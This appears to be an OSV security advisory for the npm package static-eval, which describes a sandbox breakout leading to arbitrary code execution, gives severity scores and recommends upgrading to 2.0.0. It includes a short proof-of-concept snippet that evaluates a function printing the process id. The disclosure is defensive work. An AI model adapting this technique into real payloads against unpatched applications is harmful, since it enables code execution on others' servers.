Lucene search

K
osvGoogleOSV:GHSA-5MJW-6JRH-HVFQ
HistoryAug 06, 2018 - 9:37 p.m.

Sandbox Breakout / Arbitrary Code Execution in static-eval

2018-08-0621:37:06
Google
osv.dev
11

9.8 High

AI Score

Confidence

High

0.015 Low

EPSS

Percentile

87.1%

Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id

Recommendation

Update to version 2.0.0 or later.

CPENameOperatorVersion
static-evallt2.0.0

9.8 High

AI Score

Confidence

High

0.015 Low

EPSS

Percentile

87.1%

Related for OSV:GHSA-5MJW-6JRH-HVFQ